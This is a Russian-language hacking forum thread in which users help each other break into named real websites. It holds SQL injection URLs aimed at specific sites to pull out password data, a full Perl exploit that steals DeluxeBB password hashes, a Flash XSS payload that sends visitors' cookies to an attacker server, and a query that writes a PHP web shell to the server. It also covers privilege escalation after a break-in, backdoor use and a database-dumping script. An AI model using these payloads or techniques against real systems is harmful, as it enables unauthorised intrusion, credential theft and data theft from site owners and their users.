http://www.e1.ru/wap/tv/index.php?p_id=107/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3/*

Похоже что есть apache security_mod, либо что-то самописное, не пропускает "FROM", сломал весь мозг :mad: :mad: :mad:

PS:понадобится wml browser.

2 nightmare007

попробуй вот так, может прокатит:
http://site/index.php?menu=с:/boot.ini%00

Эм... а на мои вопросы не ответили(

каким запром при mysql-inj удалить таблицу/базу данных?

id=-1+drop+table+mos_users--

это не катит

каким запром при mysql-inj удалить таблицу/базу данных?



это не катит

в контексте "SELECT" никак.

в контексте "SELECT" никак.


и как быть тогда?
как удалить таблицу/базу данных??

http://www.mysql.ru/docs/ - хороший сайт
DELETE FROM mag - удалить все записи из mag;

и как быть тогда?
как удалить таблицу/базу данных??

если не разделить DROP и SELECT то никак.

http://www.mysql.ru/docs/ - хороший сайт
DELETE FROM mag - удалить все записи из mag;

Разве DELETE можно выполнить в контексте SELECT? ;)
Можно конечно запихнуть в хранимую функцию и использовать ее в SELECT.

http://www.pconsult.dp.ua/index.php?pn=-1+union+select+1,2,3,4,5/*
user()=pconsult_user@localhost
database()=pconsult_db
version()=4.1.21-standard-log
Делал подбор перебором, но....глухо...

На100ящий
я вобше 4 версии не люблю..) заепывает искать))

есть вопрос про уязвимость в базе Oracle, при ошибке выдает:
java.sql.SQLException: ORA-01722: invalid number
или
java.sql.SQLException: ORA-01742: comment not terminated properly
http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1+union+select+1/*

http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1'+union+select+null,null,null ,null,null,null,null,null,null,null+from+users-- Вот тебе вариант хоть както работающего запроса, в таблице users 10 столбцов. Дальше сам.

Твои ошибки - ты не закрыл кавычку рядом с ID, и в оракле комментарий начинающийся с /* должен обязательно закрываться при помощи */ поэтому следует использовать -- .

Qwazar
спс. есть))
http://www.bmcc.cuny.edu/gallery/category.jsp?cat_id=1'+union+select+null,to_char(p assword),null,null,null,null,null,null,null,null+f rom+members+where+member_id=2--

Здравствуйте, подскажите пожалуйста, как быть, у меня есть эксплоит для Joomla DatsoGallery 1.6 Blind SQL Injection, чтобы его запустить в командной строке Windows с начало прописываю путь до php, а затем через пробел, путь до експлойта, я так понял два параметра последних не обязательны, ввожу имя сайта, а он выдает ошибку 404. Подскажите что я делаю не так и как лучше этот скрипт использовать?
сам он тут - securitylab.ru/poc/extra/352779.php

Здравствуйте, подскажите пожалуйста, как быть, у меня есть эксплоит для Joomla DatsoGallery 1.6 Blind SQL Injection, чтобы его запустить в командной строке Windows с начало прописываю путь до php, а затем через пробел, путь до експлойта, я так понял два параметра последних не обязательны, ввожу имя сайта, а он выдает ошибку 404. Подскажите что я делаю не так и как лучше этот скрипт использовать?
сам он тут - securitylab.ru/poc/extra/352779.php
Он запускается из браузера.
http://site.ru/datso_xpl.php?url=http://victim.com/joomla_path/

нащет удаления баз или таблиц, drop table?
и как можно внести изменения в поле, insert into?

можете навести пример или другие варианты..?

Если мускул, то никак. Нету разделения запросов. Если инъекция в селекте, то и будет выполнятся только селект.

Если мускул, то никак. Нету разделения запросов. Если инъекция в селекте, то и будет выполнятся только селект.
разделение запросов может быть если делать mysql_real_connect()

Если инъекция в инсерте, то можно воспользоваться конструкцией INSERT ... ON DUPLICATE KEY UPDATE (http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html) и провести апдейт нужной таблицы (при определённых обстоятельствах конечно)).

ок. спс за идеи) как нить реализую при определённых обстоятельствах..)

сорри за тупой вопрос, тут есть скуля?
$gname = $_GET['n'];

try{
// 1) Get guild description
$pdb = dbLayer::getCharDB();
$gname = mysql_real_escape_string($gname); // SQL injection prevention
$pdb->Execute("SELECT * FROM guilds WHERE guildName='$gname'");

if( !($guild = $pdb->Fetch()) ) throw new Exception('There is no guild "'.$gname.'" in database.');

NAT_uu, экранирование кавычки есть и скуля есть, если ты сумеешь экранирование обойти.

чем можно заменить + или %20 и еще /**/ на что то другое?

разделение запросов может быть если делать mysql_real_connect()
union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.

чем можно заменить + или %20 и еще /**/ на что то другое?

%09, а вообще, почитай про "управляющие символы" здесь:
http://ru.wikipedia.org/

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

Используй ошибки для вывода данных.

http://www.kdo.ru/article.asp?id=5709&cid=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES)

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул
ммммм.... Обчный МССкуль=)

http://www.kdo.ru/article.asp?id=5709&cid=1%20OR%201=@@version

А на мой вопрос в этой теме так и не ответили((((
---
Не успел отправить=)

NAT_uu, экранирование кавычки есть и скуля есть, если ты сумеешь экранирование обойти.Очень интересно.Функция mysql_real_escape_string как раз и позволяет защититься от инъекции .Если есть способ обхода, хотелось бы увидеть
2 NAT_uu ИМХО в этом скрипте инъекцию не проведёшь

чем можно заменить + или %20 и еще /**/ на что то другое?


+, /**/, %20, %09, %0a, %0d, %2b.

Чёт не разберусь никак с одной скулей...Может кто справится!?

http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'

Чёт не разберусь никак с одной скулей...Может кто справится!?

http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'



помойму там жосткий фильтр стоит.
ничего у меня не получается.

ты уверен чот она там есть??


на это тоже ругается:

http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d

помойму там жосткий фильтр стоит.
ничего у меня не получается.

ты уверен чот она там есть??


на это тоже ругается:

http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d
Как видишь, ошибка мускула есть :) логично предположить, что это инъекция :) Я вот тоже час парюсь, уже просто интересно стало, можно ли чего извлечь...

возможно это инъекция после лимита, т.к.

http://micropig.com/microlink/category/58/start/3,1,1,2 -error

http://micropig.com/microlink/category/58/start/3 offset 1 /* -no error
http://micropig.com/microlink/category/58/start/3,1/* -no error

Я про этот случай:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123'

Нет там иньекта, он ругается каждый раз когда не может чтото найти, например:

http://micropig.com/microlink/?srch=2&start=30&searchtext=123sdfsd

Ситуация такая, на серве мэджик квотес = он , то есть кавычки фильтруются, но можно провернуть скуль инъекцию, мне надо залить шелл ( файл прив есть, путь есть ), но как указать путь если он в кавычках ('/home/site/public_html/shell.php') ? Я помню, что Scipio писал как это можно обойти, но я тогда не врубился, может кто объяснит ?

AFoST
Наличие ошибки не означает наличие инъекции. Инъекция это возможность влиять на запрос
Сдесь:
_http://micropig.com/microlink/?srch=2&start=30&searchtext=123
такой возможности нет
Сдесь:
_http://micropig.com/microlink/category/58/start/3
тройка это limit 3 т.е. можно повлиять так как ты описал:
_http://micropig.com/microlink/category/58/start/3,1/*
limit 3 offset 1(offset по умолчанию = 37)
Но ничего путного от этой инъекции (в mysql) не добиться

0nep@t0p
Скинь сюда сайт, чтобы метод Scipio работал данные из первого запроса должны попадать во второй, тогда будет возможность залить шелл

2 l-l00K
Запрос такой:
-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19/*
То есть мне надо составить такой запрос - -16+union+select+1,0x2D313620756E696F6E2073656C6563 7420273C3F70687020706870696E666F28293B203F3E2C3220 66726F6D206D7973716C2E7573657220696E746F206F757466 696C6520272F686F6D652F736974652F7075626C69635F6874 6D6C2F7368656C6C2E706870272F2A,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19/*
Где в хексе прописано - -16 union select '<?php phpinfo(); ?>,2 from mysql.user into outfile '/home/site/public_html/shell.php'/*
Правильно ?

А ты уверен что данные из 2-рого поля попадают в другой запрос и что в другом запросе 2 поля? Если это так, то по сюжету должно прокатить

Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал

Подставь 0x27 по очереди в каждое поле, если появится ошибка, значит попадают, разумеется если вывод ошибок не выключен

Вывод не отключен, а как вычислить количество полей во втором запросе ?

Ну а дальше как с простой скулей, подбирай поля при помощи order by

union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.
Я говорю что вообще это вожможно)
Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал
Данные попадают во второй запрос если там используются. Количество полей зависит только от их количества в запросе. И вообще не у одного Scipio хватило мозга придумать такое, раньше такое тоже пользовали.

Ребятки подскажите, пожалуйста, почему не работает Exploit.
Exploit…
#!/usr/bin/perl

use IO::Socket;


print q{
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
################################################## ####
};

if (!$ARGV[2]) {

print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid

perl dbbxpl.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .=

"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%

20WHERE%20(uid='".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED ";
print "[~] SENDING QUERY... ";
print $socket "GET $path HTTP/1.1 ";
print $socket "Host: $server ";
print $socket "Accept: */* ";
print $socket "Connection: close ";
print "[+] DONE! ";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1." ";
print "--------------------------------------------------------------------------------------\r\n";

}
exit();
}


}
print "------------------------------------------------------------------------------------------------\r\n";

################################################## #######
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
################################################## #######

C:\usr\bin>dbbxpl.pl www.forum.profiforex.ru / 24

################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
################################################## ####
--------------------------------------------------------------------------------
----------------
[>] SERVER: www.forum.profiforex.ru
[>] DIR: /
[>] USERID: 24
--------------------------------------------------------------------------------
----------------

[~] PREPARE TO CONNECT...
[+] CONNECTED [~] SENDING QUERY... [+] DONE! --[ REPORT ]-----------------------
-------------------------------------------------------------
--------------------------------------------------------------------------------
----------------

Вернее он работает, но как-то не информативно.

дык могет форум та не бажный :)

У меня никогда этот сплойт не работал.

дык могет форум та не бажный :)
А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!

Так тоже пытался…
Только вот что-то не очень получается…
Или это у меня руки кривые…!?


vBulletin v3.6.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:
[site]/vb/includes/functions.php?classfile=[Shell-Attack]
[site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
[site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]

А проверить как как-то можно?
Пытался вручную, но что-то не получается!
Может и правда не бажный!?
Надо искать какую-то альтернативу!
А саму скулю подставлял:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.

']А саму скулю подставлял:
misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%
Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
Подставлял!
Похоже и правда профиксено!
Ничего нету не ошибки, не информации!
Ребятки подскажите, что еще можно туда вставить!

И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??

getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");

да, это ActionScript- язык сценариев, иcпользуемый в Flash

SeeJay
Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:
alert('Flash XSS!');
Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
строку: "javascript:код". У тебя должна получится всего одна строка следующего содержания:
getURL("javascript:alert('Flash XSS!')");
в твоем случае это:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:
<object>
<embed src="ФЛЕШКА.swf" type="application/x-shockwave-flash" />
</object>
поидее должно работать) главное не падай в минуса..

SeeJay
Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:

Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
строку: "javascript:код". У тебя должна получится всего одна строка следующего содержания:

в твоем случае это:

Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:

поидее должно работать) главное не падай в минуса..
Спасибо буду пробовать!

Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.

Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.
Что за бред, ты юзаешь скрипт на локалхосте и не можешь подобрать путь?

Народ,почему все статьи о взломах есть,кроме php inj??
ПРосьба написать

Все есть..
http://forum.antichat.ru/thread23501.html
https://forum.antichat.ru/thread12123.html

Спасибо буду пробовать!
Дааааааа…
Форум то мой пропатчен от и до!
Буду пробовать через другие залезать!
Буду, благодарен совету!

С уважением и благодарностью SeeJay!

как обновить в селект запросе данные в БД?

UPDATE phpbb_users set user_password=81dc9bdb52d04dc20036dbd8313ed055 where username=admin

как это использовать?

думаю так:
id=2+or+1=+1;update+phpbb_users+SET+user_newpasswd =char(закодируем)+where+user_id=2/*
но помоему невсегда будет работать..

Ничего вы этим не сделаете. Я написал выше.

И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??

getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
class hek{
function hek() {
}

static function main(mc) {
getURL("javascript:alert(document.cookie);");
}
}
Далее компилим
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
заливаем куда надо и всё собственно

Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools (http://www.swftools.org/swftools-0.7.0.exe)
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump
swfdump.exe hek.swf
компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)
mtasc.exe -swf hek.swf -main -header x:y:z hek.as
x и y - размеры, z - частота кадров в секунду
и вживляем
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf

а уязвимости движков на файлах и на базах сильна отличаются?

а уязвимости движков на файлах и на базах сильна отличаются?
:( в чем суть вопроса то?

>> а уязвимости движков на файлах и на базах сильна отличаются?

xss/lfi/rfi/exec - остаются такими же в движках на текстовых файлах. Единственное чего нету это sql-inj.

ясна,это хорошо

Подскажите , есть слепок БД одного форума .
Смогу ли я методом INSERT INTO FILE залить туда шелл ?
Если можно с примером , в mysql не силён
Спасибо .

Термин "слепок БД" мне не знаком. Могу предположить, что это дамп базы. С дампом ты шелл, конечно, не зальешь. Метода INSERT INTO FILE нету =\. В случае с гипотетической инъекцией, можно сделать так: http://site.ru/?id=-1+UNION+SELECT+1,'<?php system($_GET[cmd]); ?>',3+INTO+OUTFILE+'полный путь до файла'/*. Выполнится, если есть file_priv в mysql.user и magic_quotes_gpc=off.

Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?

Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
мое мнение - только если есть file_priv, у пользователя mysql.
ну или в самой базе содержится Php код, и потом выполняется в eval ... (очень редко такое бывает)

http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,table_name,3,4,5,6,7,8,9+fro m+information_schema.tables+limit+23,2/*
Колонка форума с юзерами. но что дальше делать это я забыл ;( подскажите

Вообще то тебе дальше нужно узнать как называются столбики в найденой таблице, для этого нужно вывести поле column_name из таблицы information_schema.columns при этом указать where table_name='phpbb_acl_users' но если там кавычки фильруются то нужно закодировать допустим чаром вот так table_name=CHAR(112,104,112,98,98,95,97,99,108,95, 117,115,101,114,115)
Отсюда запрос будет таким
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_name,3,4,5,6,7,8,9+fr om+information_schema.columns+where+table_name=CHA R(112,104,112,98,98,95,97,99,108,95,117,115,101,11 4,115)/*
Потом лимитом перебираеш все столбики... НО... я глянул в это таблице вроде нету поле пароля...
Я обычно для ускорения делаю так
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_name,3,4,5,6,7,8,tabl e_name+from+information_schema.columns+where+colum n_name+LIKE+CHAR(37,112,97,115,37)+limit+0,1/*
под чаром скрыто %pas% Это значит что я хочу вывести все столбики в которых есть сочетание 'pas' ;) Можно конечно нарватся и на pwd тогда этот запрос не пройдет, но обычно значительно ускоряет процес.
Удачи!

А разве скл инж тул не работает в данном случае ?Особенно в пятой версии)

Велемир
о да.. еще как работает sql tool 3

пс: у кого есть норм енкодер text в char()?

http://www.webfuture.ru/igo/convert.php

спс)

ситуация такая:

Есть форум - вобла.
там можно юзать авики. Но там как и на ачате, не видно где лежит авик. а такой адрес, типа _http://forum.antichat.ru/image.php?u=34303&dateline=1206845324

мне нужно в авик вписать шелл.

вопрос:
как мне анйти путь к моему авику? Или в этом случае аваторы в БД?

В булке аватары в бд если не ошибаюсь)

Есть скуля. Версия 5. База данных и юзера выдернул.
Когда начинают вытаскивать наименования колонки, меня выкидывает на белую страницу ни без чего.
Есть предположение, что фильтрует "table_name" - как этот фильтр обойти?

Ershik, hex(unhex(table_name)) попробуй.

з.ы. Можно ещё с aes_encrypt поэксперементировать

Страница есть, но вывод информации пропал.
Самое грустное, что там оключен вывод ошибок.

Ershik
Может ссылку? Доступ к шеме есть?

Закинул ссылку в личку. Определил, что ругается на table_name. Ничего больше не фильтрует.

Посмотрел с лимитом пашет

Ershik, hex(unhex(table_name)) попробуй.

з.ы. Можно ещё с aes_encrypt поэксперементировать
Может всё-таки unhex(hex(value)) ? а то как-то нелогично..

jokester, спасибо.

+toxa+ запахало, но не видно вывода таблицы на "стандартном месте".

Извиняюсь, забыл убрать пробел. Все работает.

Может всё-таки unhex(hex(value)) ? а то как-то нелогично..:D Я даже не увидел,но сдесь пофигу, там нормальная кодировка

+toxa+, оу, да)) ну опечатался..

Как под gnix заставить интерпретировать php как gif файлы?

надо прописать в конфиге, что все расширения .gif исполнялются как PHP.

Народ, ктонить разъясните ошибку :


ERROR
Stored procedure execution failed with error!
Type: [object Error]
Number: -2147217900
Description: ORA-06550: line 1, column 74: PLS-00103: Encountered the symbol ">" when expecting one of the following: . ( ) , * @ % & = - + < / > at in is mod remainder not rem <показатель (**)> <> or != or ~= >= <= <> and or like LIKE2_ LIKE4_ LIKEC_ between || multiset member SUBMULTISET_ ORA-06550: line 1, column 125: PLS-00103: Encountered the symbol "END"

Судя по всему Оракл:Р,ругающийся на что-то :

POST /remind.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: requiem-online.ru
Content-Length: 75
Cookie: ASPSESSIONIDCQDCCAAB=IHFAIINBBIGEAIAPBPHDIJEA;dtm% 5F%5Fret%5Fp=Mon+Jun+2+13%3A33%3A10+UTC%2B0400+200 8;cur%5Fdtm%5Fret%5Fp=1
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

remind_action=1&usr_email='&usr_id=111-222-1933email@address.tst

Сканер выдал полноценную инъекцию,но я ему не верю =_=.Смахивает на какую-то ошибку в приложении)


remind_action=1&usr_email=111-222-1933email@address.tst'+%7C%7C+'1%3D0'/**/&usr_id=111-222-1933email@address.tst

В том же скрипте,если передать это с определённым количеством кавычек,то выдаст:

ADODB.Command error '800a0d5d'

Application uses a value of the wrong type for the current operation.

/./include/inc_remind.asp, line 26

Но больше ничё не меняется.

http://www.tafy.ro/magazin.asp?action=add&item=32&count=-1'
собственно сайт
выдает вот это:
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'CInt'

/magazin.asp, line 213

Как можно в ipb узнать установочный путь? версия 2.1.7

Скажите, а куки с mybb.ru расшифровать как-то возможно?

Mnw1OWIxOWVkYTE1MTkxYjRkOGRhMDNlMjg0MDVkZDVmNDcyMj c*****

Это какой-то хеш?

Скажите, а куки с mybb.ru расшифровать как-то возможно?

Mnw1OWIxOWVkYTE1MTkxYjRkOGRhMDNlMjg0MDVkZDVmNDcyMj c*****

Это какой-то хеш?
это base64. в расшифрованном выглядит как
2|59b19eda15191b4d8da03e28405dd5f4722

какие знаете варианты добычи дампа бд через скуль?

sabe, хапай пароли админа, подулючайся через phpmyadmin или любой другой менеджер БД и делай дамп.

Ребят, все равно не могу разобраться с куки... Прочитал статью на форуме. По идее в моем расшифрованном куки дожен быть логин и хеш пароля. Получается полная галиматья. Моя задача именно извлечь логин\пароль. Кто-то это делал нормально?

mybb_ru=Nnw2M2JjMWM4OGJjNTQ5YTAwMTFhYWQ5YmJkYmJkYj k1NmNhYjc1N2I2; MG_2445=5

Тестовый юзверь. Логин AARON, пасс 12345
Что бы я не делал я не могу получить не намека на логин и пасс...

Lesnoy_chelovek
а запросом никак?

добрый день, уважаемое сообщество!
срочно нужна помощь в следующем:

я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied

мне необходимо поднять права юзера на Microsoft-IIS/6.0
нужна dll-ка или софтина для увеличения привилегий

или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там :(


всем заранее спасибо за помощь.

2 Sabe
Ну если версия 5 ( если майскуль ) то можно вручную извлечь из всех таблиц всю инфу с БД, также есть много скриптов на пхп и перл для автоматизации этого процесса. В ином случае никак бд не слить

добрый день, уважаемое сообщество!
срочно нужна помощь в следующем:

я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied

мне необходимо поднять права юзера на Microsoft-IIS/6.0
нужна dll-ка или софтина для увеличения привилегий

или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там :(


всем заранее спасибо за помощь.

Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.

0nep@t0p
припустим что 5. можно пример запроса? или скрипт для автоматизации :)

<?php
set_time_limit(0);
ignore_user_abort(true);
$s=1;
$f=39913;
$fph = fopen ("result.txt", 'a+');

for ($i=$s; $i<=$f; $i++) {
$aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a )+from+information_schema.tables+limit+".$i.",1/*");
$res=null;

$pattern ="/:::(.+):::/";
preg_match_all($pattern, $aps, $out);
$res=array_values(array_unique($out[0]));
fputs ($fph, $res[0]."\r\n");

sleep (5);
}
fclose ($fph);
?>
Незабудь подправить запрос соответсвенно нуждам

Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.

Win Server 2003 R2
SP2

а шо значит ошибка 406?пыталась попасть в etc путь вида p=../etc/домен/&f=passwd ,ниче страшного если так и оставить,или лучше и это фильтровать?

ошибку эту знаю,всмысле оно ж все равно не даст файл открыть,или можна попытатьса?

нашел там в C:\Inetpub\wwwroot\da***\idq.dll, в которой прописан

There will add a Administrators User "iisuser",Its Password is "ab007".If you want to enter cmd.exe shell,please use ispc.exe.

как его запустить?

ничего не получается :(

Значение параметра "npcs" передается в функцию js g_inintPath, там преобразоввывается 7 = База=>NPCs=>Humanoids, 7-1 = База=>NPCs=>Undead, и т.д.

Заметь, при значении 7-1 содержимое самого списка на странице не меняется, т.е. в скуль попадает только 7, а не 7-1, т.ч. параметр "npcs" фильтруется.

Какой программой можно формировать и посылать на нужный сайт tcp/ip запросы, просматривать пакеты и пр.?

Я не совсем понял тебя про TCP/IP запросы... хм, это что?
Если же ты имел виду посылку запросов по HTTP протоколу (POST, GET...) то можно использовать аддоны к файрфоксу.
UrlParams - позволяет редактировать как гет так и пост. (https://addons.mozilla.org/ru/firefox/addon/1290)
LiveHTTPheaders - показывает запросы и позволяет их отправить повторно, можно при этом их подредактировать. (http://livehttpheaders.mozdev.org/)
Tamper Data - позволяет перехватывать запрос и изменять. (http://tamperdata.mozdev.org/help.html)

Это я и имел ввиду :) Спасибо :)

Ershik, есть ещё NAVUNS + INETCRACK старая но удобная связка :)

Нашёл какой-то банковский сайт).Смог подобрать только количество полей:

http://www.procreditbank.com.ua/index.php?cat=23&news=3525+order+by+8/*

Версия 4,вывода нет.Селект-запросы не проходят,чё делать хз.

Нашёл какой-то банковский сайт).Смог подобрать только количество полей:

http://www.procreditbank.com.ua/index.php?cat=23&news=3525+order+by+8/*

Версия 4,вывода нет.Селект-запросы не проходят,чё делать хз.
посимвольный брут? :confused:
----------------------------------------------------
кстате, скулю кажеться прикрыли ;)

Хотел спросить о Microsoft OLE DB Provider for SQL Server:
http://www.genealogia.ru/ru/oforums/messages.htm?f=299'
как реализовать?

http://www.genealogia.ru/ru/oforums/messages.htm?f=299%20and%201=(select%20top%201%20t able_name%20from%20information_schema.tables)
Там MSSQL, читай маны

ок.. понятно.. там int, а данные передаются в nvenchar, нужно использовать convert(int, ) или cast( , as int) для переобразовки? и еще.. как заюзать limit?) ибо не выходит..)

Там надо не лимит юзать, а not in вроде как. Я не спец, это всего лишь одна из догадок на основе увиденного в соседней теме )